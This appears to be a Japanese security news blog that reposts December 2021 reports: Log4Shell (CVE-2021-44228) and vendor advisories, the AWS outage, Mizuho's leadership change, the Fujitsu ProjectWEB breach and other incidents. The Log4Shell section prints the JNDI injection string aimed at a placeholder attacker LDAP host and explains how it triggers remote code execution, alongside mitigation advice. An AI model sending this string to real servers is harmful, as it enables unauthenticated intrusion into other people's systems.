Javaのログ出力ライブラリ「Apache Log4j」に存在するリモートから悪用可能な脆弱性(CVE-2021-44228)


Log4j: List of vulnerable products and vendor advisories:

2021年12月9日、Apache Log4jのロギング・ライブラリに重大な脆弱性があるというニュースが流れ、概念実証済みの脆弱性が出現しはじめました。

Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションでエンタープライズレベルで使用されています。

Apacheは、Log4ShellまたはLogJamとも呼ばれる、現在CVE-2021-44228として追跡されている最大深刻度の脆弱性に対処するために、Log4j 2.15.0をリリースしました。

CloudflareとCisco Talosのデータによると、大規模な悪用が始まったのは、悪用コードが自由に利用できるようになってからですが、今月初めから攻撃が検出されています。

Log4Shellの欠陥は、11月24日にAlibabaのクラウドセキュリティチームによって報告されましたが、一部の攻撃者がなぜこれほど早く悪用できたのかは不明です。

Cybersecurity and Infrastructure Security Agency(CISA)のディレクターであるJen Easterly氏は、Log4Shellの脆弱性に関する土曜日の声明で、同機関が民間および公的セクターのパートナーと協力してこの問題に対処していると述べています。

Log4Shell は、Java Naming and Directory Interface (JNDI) インジェクションで、認証されないリモートでのコード実行を可能にします。攻撃者は、ブラウザのユーザーエージェントを次の形式の文字列に変更することで、これを利用することができます。

${jndi:ldap://[attacker_URL]}

この文字列は、被害者のWebサーバーのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックやリクエストを強制的に実行します。攻撃者は、この文字列を使用して、脆弱なマシンにエンコードされたコマンドやJavaクラスを渡すことができます。


CISAは本日、脆弱性の深刻さとその悪用が容易であることから、Log4Shell攻撃に対する防御を設定するための企業向けガイダンスを発表しました。同機関が推奨するのは、「利用可能なパッチを直ちに適用すること」であり、このプロセスに優先順位をつけることです。

パッチ適用が不可能な場合、同機関は以下の変更を推奨しています。

アプリケーションを起動する Java Virtual Machine コマンドに -Dlog4j2.formatMsgNoLookups=True という文字列を追加して log4j2.formatMsgNoLookups を true に設定する。

この場合、メッセージのフォーマットをルックアップに依存している場合、システムのロギングに影響を与える可能性があるという注意点があります。また、この緩和策はバージョン2.10以降にのみ有効です。

Log4Shellの詳細が判明した直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果について情報を提供しています。

Amazon

アマゾンは、いくつかの製品をアップデートし、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品もアップデート中であるか、近い将来に新しいバージョンをリリースする予定であると発表しました。

同社は、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどの影響を受けるサービスに関する詳細を発表している。

Atlassian

同社の評価によると、オンプレミス製品のデフォルト設定では、悪用されやすい脆弱性はないと考えています。

JMS Appender 機能を有効にするためにデフォルトのログ設定 (log4j.properties) を変更すると、Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible など一部の製品でリモートコード実行のリスクがもたらされる可能性があるそうです。

Broadcom

同社は、Log4jの脆弱性の影響を受ける複数のシマンテック製品について、緩和策とナレッジベースの記事を公開しました。CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれる。

Cisco

シスコは、Log4Shellの影響を受ける自社製品のリストと、12月14日から一部の製品にパッチを適用するカレンダーを公開しました。

影響を受ける製品は、以下のような様々なカテゴリーに分類されます。
  • ネットワークおよびコンテンツセキュリティ機器(Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
  • コラボレーションとソーシャルメディア(Cisco Webex Meetings Server)
  • ネットワーク管理およびプロビジョニング(Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
  • エンタープライズ ルーティングとスイッチング(Cisco Network Assurance Engine、Cisco SD-WAN vManage)
Citrix

調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、シトリックスは、Log4Shellの脆弱性がある製品としてリストアップしていません。

ConnectWise

同社のクラウドサービスであるPerchが、「潜在的な脆弱性を持つ」サードパーティーコンポーネントに依存していることが判明した、とConnectWise社のアドバイザリーには書かれています。

脆弱性のあるサードパーティは、ConnectWiseのStratoZenソリューションで使用されているFortiGuardのFortiSIEMと判明し、同社はホスティングされているStratoZenサーバーへのアクセスを一時的に制限するよう促されました。現在では、ほとんどのサービスへのアクセスが回復しています。

cPanel

フォーラムのスレッドによると、cPanelのSolrプラグインが存在するインスタンスのみが影響を受け、悪用される可能性があるが、ローカルにのみ存在するとのことです。

あるスタッフは、Log4Shellに対する緩和策を含むアップデートがcpanel-dovecot-solrパッケージに用意されていることを発表し、さらに安心感を与えてくれました。

Debian

Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), 12 (Bookworm) にセキュリティアップデートとして、パッチを適用した Log4j パッケージが追加されました、と勧告があります。

Docker

Docker Officialイメージの12個に、脆弱性のあるバージョンのLog4jライブラリが使用されていることが判明しています。couchbase、elasticsearch、logstash、sonarqube、solrが含まれる。

Dockerは、「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新中」であり、他の理由でイメージに脆弱性がない可能性があると述べている。

FortiGuard

同社からのアドバイザリーでは、約12の同社製品に脆弱性があるとされており、そのうち4つの製品についてはすでに修正または緩和措置が展開されているとのことです。

FortiGuardは、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなど他の製品の修正プログラム適用時期について、アドバイザリを更新すると発表している。

F-Secure

エフセキュアのいくつかの製品のWindows版とLinux版の両方がLog4Shellの影響を受けています。Policy Manager (Policy Manager Server コンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、および Elements Connector です。

同社は、この問題を修正するための管理者向けセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。

Ghidra

NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係を脆弱性のないイテレーションにアップグレードしています。

IBM

IBMのLog4Shellに関するアドバイザリによると、Admin ConsoleとUDDI Registry Applicationコンポーネント経由で、WebSphere Application Serverバージョン9.0と8.5のみが脆弱性の影響を受け、この問題は解決されているとのことです。

Juniper Networks

ネットワーク会社は、同社の4つの製品が影響を受けることを明らかにした。Paragon Active Assurance、Paragon Insights、Paragon Pathfinder、Paragon Plannerの4製品に影響があることを明らかにしました。

評価は継続中ですが、現段階ではさらに6つの製品が影響を受ける可能性があります。JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director (Security Director Insightsは除く)

McAfee

同社はまだ評価を完了しておらず、12製品を審査中であり、関連情報が入手でき次第、アドバイザリーを更新する予定です。

MongoDB

Log4Shellに対してパッチを適用する必要があるのはMongoDB Atlas Searchのみであると、本日更新されたアドバイザリーで同社は指摘しています。

開発元は、パッチを適用する前に悪用された証拠や侵害の指標を発見しなかったと付け加えています。

Okta

Oktaは、Log4Shellの脆弱性によるリスクを軽減するため、Okta RADIUS Server AgentおよびOkta On-Prem MFA Agentのアップデートをリリースし、お客様にアドミンコンソールからの修正プログラムの適用を強く推奨しています。

Oracle

オラクルによると、「いくつかの」自社製品が、どの製品が、いくつの製品が、脆弱性のあるバージョンのLog4jコンポーネントを使用していると公表していない。

同社は、顧客にMy Oracle Support Documentを紹介し、提供されるアップデートを "できるだけ早く "適用するよう強く推奨するセキュリティ警告を発表した。

OWASP Foundation

先日のアドバイザリで、Zed Attack Proxy (ZAP) ウェブアプリのスキャナ 2.11.1 以下のバージョンに、脆弱な Log4j コンポーネントが使用されていることが明らかになりました。

Red Hat

Red Hat は、複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けることを金曜日に明らかにし、利用可能になり次第、アップデートを適用するよう顧客に強く推奨しています。

勧告に記載されている製品は、Red Hat OpenShift 4および3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、Red Hat Fuse 7である。

AWSで障害、多数のウェブサイトやアプリに影響(転載)~クラウドを採用するということは、障害発生時に指をくわえて見守るしかないことを覚悟せよ~


アマゾンで障害、多数のウェブサイトやアプリに影響:

Amazon Web Services(AWS)で米国時間2021年12月7日に障害が発生し、複数のウェブサイトやアプリを一部のユーザーが利用できない状態になった。AWSでは、「Disney+」「Robinhood」「Barclays」「Slack」などのサービスに処理能力やストレージを提供している。今回の障害では、ワシントンDCやニューヨーク市を含む米国東海岸の地域に障害発生の報告が集中していた。

障害に関するデータを収集するDown Detectorには、7日の米国東部時間正午前の時間帯に、AWSを利用するサイトの障害報告が1万1000件以上まで急増している様子が示されている。

システムアクティビティーをモニタリングするためのAWSのステータスページには、同社のバージニアにある施設で発生した問題がUS-EAST-1リージョンに影響を与えていると記載されている。その問題は、企業がウェブサイトやアプリを運用するために使用する、複数のAWS製品に影響を与えたようだ。

「根本原因を特定済みで、復旧に向けて鋭意対応している」と更新情報には記されている。

Down Detectorには、数十件のサービスの障害報告も示されているが、そのすべてがAWSの障害が始まった時間から発生している。Amazonそのものに加えて、傘下のサービスである「Ring」「Prime Music」「Alexa」「Chime」や、TicketMaster、Google、McDonald's、Venmo、Cash App、そして米社会保障局のオンラインアカウント用ポータルであるMy Social Securityなども、7日の午前11時頃から障害に見舞われている。

ー2021/12/15追記ー

AWS、12月7日の大規模障害について詳細を報告アーカイブ

みずほFG システム障害頻発で首脳陣一新・・・(転載)~ITを理解できない人が会社を経営するとこうなる~

みずほFG システム障害頻発で首脳陣一新…ついに消滅した「興銀の栄光」

官界通(以下=官):みずほフィナンシャルグループ(FG)の佐藤康博会長(69)と坂井辰史社長(62)が、度重なるシステム障害で利用者に不便と不安を与えた責任で、ようやく辞任を決めたな。2人はみずほの母体の一つ、旧・日本興業銀行の出身。ある興銀OBが「これで、栄光の興銀の歴史は終わる」と嘆いていた。

政界通(同=政):責任は明確だったのに、なぜ体制一新が遅れたの?

財界通(同=財):2人に「辞任は当然」とする一般の感覚が欠けていたからだろう。

官:興銀出身という点が、関係しているのか?

財:そうだと思う。興銀は明治時代に産業振興のために設立された国策銀行で、債券を発行して得た資金で融資を拡大。とくに鉄鋼、造船、化学、電力など巨大な装置を必要とする重工業の発展に貢献した。戦後も金融債の「ワリコー」「リッキー」が富裕層の人気を集め、2002年4月に経営統合でみずほコーポレート銀行に衣替えするまで存在感を維持した。

官:そう、「財界の鞍馬天狗」の異名を持つ中山素平氏をはじめ歴代頭取は、海外や財界でも活躍した。

政:それに比べ、佐藤氏や坂井氏は小粒で、巨大銀行の舵取りを誤ったということか。

■リテールのあるメガのトップは無理だった

財:そこまでは言わないが、大企業金融の世界で育った人が膨大な個人や中小零細の業者をお客に持つメガバンクグループのトップを務めることに、無理があった。数字優先で、統合の相手だった富士銀行系や第一勧業銀行系の支店を減らし、システム要員らの削減へ猛進した。

政:それが、障害頻発の遠因か。

官:金融庁が出した業務改善命令にも、その視点がある。

財:辞任は2人だけでなく、傘下のみずほ銀行の藤原弘治頭取(60)も辞める。ただ、藤原氏の後任は富士出身の加藤勝彦副頭取(56)に決まったが、FGトップは未定だ。

官:金融庁の雰囲気では、興銀出身者が3代続けて就任する可能性はないな。

財:当然だ。今回だけでなく、もう二度とないかもしれない。


【参考】

みずほ銀行及びみずほフィナンシャルグループに対する行政処分について (バックアップ


CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)リニューアル



hiro_ retweeted:
CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)を更新しました。どうぞご利用ください。^YK jpcert.or.jp/csirt_material…


CSIRT(シーサート: Computer Security Incident Response Team) とは、組織内の情報セキュリティ問題を専門に扱う、インシデント対応チームです。

近年の組織 (企業) の IT 利用の拡大に伴い、情報セキュリティ対策は組織にとって重要な問題となってきています。高度に複雑化し、かつインターネットを介して大容量のデータを瞬時に、しかも容易に世界中とやり取りできる IT システムの利用が一般的になったことで、単に「現場 = システム管理者」の頑張りだけで済む問題ではなくなってきています。例えば、情報システムがコンピューターウイルスに感染してしまったために、顧客の個人情報が世界中にばら撒かれてしまったといった事態を考えてみれば、情報セキュリティの問題が、もはやシステム管理者だけの問題ではなく、経営層が積極的に関与しなければならない問題であることは容易に想像できると思います。このような中で、組織の情報セキュリティ対策として注目されているのが、情報セキュリティの問題を専門に、ただし組織全体の視点から取り扱うCSIRTの構築です。

CSIRTマテリアルは、組織的なインシデント対応体制である「組織内CSIRT」の構築を支援する目的で作成したものです。これから自組織内にCSIRTを構築しようと考えている組織の方が、それまでのインシデント対応経験をもとに、既存の体制を整理したり、見直したりしてCSIRTの構築に繋げる際の参考として頂くことを意図しています。一連の資料では組織内CSIRTが一般的に備えるべき機能や能力等について説明していますが、すべての組織内CSIRTがそれらを達成しなければならないというものではありません。それぞれの組織の状況に応じた適切なCSIRTの形があり、本資料がそれを見つける際の助けとなれば幸いです。


NHK子会社社員を懲戒解雇 2,800万円分チケット換金、私的流用(転載)~経理担当が裏切らないとは限らない。内部不正対策の観点からもゼロトラストの発想が必要~

経理担当が裏切らないとは限らない

NHK子会社社員を懲戒解雇 2800万円分チケット換金、私的流用

仕事で使うと装って旅行会社から新幹線のチケット約2,800万円分をだまし取り、現金化して私的に使ったとして、NHKの子会社NHKグローバルメディアサービスは2021年12月10日、40代の男性社員を懲戒解雇にし、発表した。

同社によると、社員は2021年7月~10月、取引先プロダクションの架空の出張名目で85件約2800万円分のチケットを旅行会社から受け取り、JRの窓口で払い戻して、自身のローンの返済などにあてていたという。代金は未払いで、グローバル社が弁済した。

2017年から今年7月までに同様の方法で購入、現金化したチケットは計約1億5千万円分にのぼり、代金は新たなチケットの払い戻しなどで支払ってきたといい、今回の未払い分も「いずれは返すつもりだった」と話しているという。

同社は告発などについて警察と相談しているといい「あるまじき行為であり、深くおわびいたします。再発防止に向けて全社的な取り組みを徹底してまいります」とのコメントを出した。

スイパラ通販利用者がクレカ不正利用被害に 運営元は「因果関係を調査中」(転載)

スイーツパラダイスの不正アクセス被害

スイパラ通販利用者がクレカ不正利用被害に 運営元は「因果関係を調査中」

「スイーツパラダイスの公式通販サイトを利用した後、クレジットカードが不正利用された」——そんな報告がTwitter上で相次いでいる。スイーツバイキングチェーン店「スイーツパラダイス」を運営する井上商事は報告を受け、2021年12月9日に公式通販サイトを一時閉鎖。取材に対し「事態は認識しており、原因がどこにあるのか確認中」としている。

Twitterでは9日午後8時ごろ、11月下旬に開催されたオンラインゲーム「原神」のコラボカフェイベントなどの際に同サイトでクレジットカード決済を行った人々から、上記のような報告が上がり始めた。海外のショッピングサイトやAppleなどの名義で身に覚えのない引き落としがあったという。



井上商事に問い合わせたところ「Twitterでの報告を見て気付き、被害が拡大しないよう公式通販サイトをメンテナンス中とした」と説明。「問題の原因が当社にあるのか、別のところにあるかを含めて現在調査中」としている。

日本の政府機関が富士通のツールを足掛かりにデータ漏洩の被害を受ける / Japanese government agencies suffer data breaches after Fujitsu hack(転載)~ソリトンの次は富士通かぁ~

Japanese government agencies suffer data breaches after Fujitsu hack

富士通の情報共有ツール「ProjectWEB」を介して、日本の複数の省庁が不正アクセスを受けました。

富士通の発表によると、ProjectWEBを利用したプロジェクトへの不正アクセスが行われ、一部の顧客情報が盗まれたとのことです。

なお、今回の不正アクセスが、脆弱性を狙ったものなのか、サプライチェーンを狙ったものなのかは明らかになっておらず、現在調査を進めています。

攻撃者は、少なくとも76,000件のメールアドレスにアクセス

昨日、国土交通省と内閣サイバーセキュリティセンター(NISC)は、富士通の情報共有ツールを介して攻撃者が内部情報を入手できたことを発表しました。

また、富士通は、攻撃者がProjectWEBを利用したプロジェクトに不正にアクセスし、独自のデータを盗み出したと発表しました。

富士通のProjectWEBは、企業や組織が、プロジェクトマネージャーやステークホルダーなどと、社内で情報を交換することを可能にします。

ProjectWEBログイン画面

ProjectWEBを経由して政府機関のシステムに不正にアクセスすることで、少なくとも76,000件のメールアドレスや、メールシステムの設定などの専有情報を取得することができたことが、国土交通省によって確認されています。

富士通の資料によると、2009年の時点で、このツールは約7,800のプロジェクトで広く使用されていたとのことです。

情報共有ツールの活用例を示す富士通ProjectWEBの概要  

なお、流出した電子メールアドレスには、専門家会議のメンバーなど外部の関係者のものも含まれており、個別に通知を受けています。

成田空港でも、航空管制データやフライトスケジュール、業務に関する情報が盗まれ、影響を受けました。

また、日本の外務省では、情報漏えいにより、一部の研修資料が流出しました。

内閣サイバーセキュリティセンター(NISC)は、富士通のツールを利用している政府機関や重要インフラ組織に対し、不正アクセスや情報漏えいの兆候がないか確認するよう、複数の注意喚起を行いました。

富士通、オンラインポータル「ProjectWEB」を一時停止

富士通は、この問題の範囲と原因を完全に調査している間、ProjectWEBポータルを停止しているとのことです。

ログインポータルへのURLにアクセスしようとするとタイムアウトしてしまいます。


ProjectWEBポータルは「soln.jp」ドメインでホストされていたため、自分の組織が影響を受けているか、あるいはかつて顧客であったかどうかを確認する一つの方法は、ネットワークログにこのドメインや前述のURLの痕跡を探すことです。

富士通は、プレスリリースの中で、関係当局に通知するとともに、顧客と協力して侵害の原因を特定すると述べています。

現在、富士通はこの事件を徹底的に調査しており、日本の当局と緊密に協議しています。富士通の広報担当者は、「予防措置として、このツールの使用を停止し、影響を受ける可能性のあるお客様にはその旨をお伝えしています」と述べています。

この攻撃の技術的な詳細については未定ですが、この事件は、何百もの顧客組織に影響を与えたファイル共有ツール「Accellion」のハッキング事件と似ています。

【参考】

ー12/14追記ー

ランサムウエアギャングLV-BLOGがwww.kobebussan.co.jpのデータをハッキングしたと主張


LV-BLOG https://darkfeed.io/2021/12/11/lv-blog-27/

LV-BLOG

https://darkfeed.io/2021/12/11/lv-blog-27/

株式会社神戸物産(こうべぶっさん、英: KOBE BUSSAN CO.,LTD.)は、兵庫県加古川市に本社を置く日本の企業。主に業務用食品の販売を手がけるフランチャイズチェーン (FC) 方式のチェーンストアである。1981年(昭和56年)創業。小売店舗は「業務スーパー」の名で全国展開しており、当名称は同社の商標となっている。本店については2021年(令和3年)4月3日より加古川市に移転。

なお、広島市に拠点を置く株式会社アクト中食(1911年〈明治44年〉創業)は、当社の「業務スーパー」と業態が同じ店舗「業務用食品スーパー」を瀬戸内地方で展開しているが、互いに無関係である。アクト中食は「業務用食材流通グループ (NCF)」に加盟する企業であり、その意味での「業務用食品」である。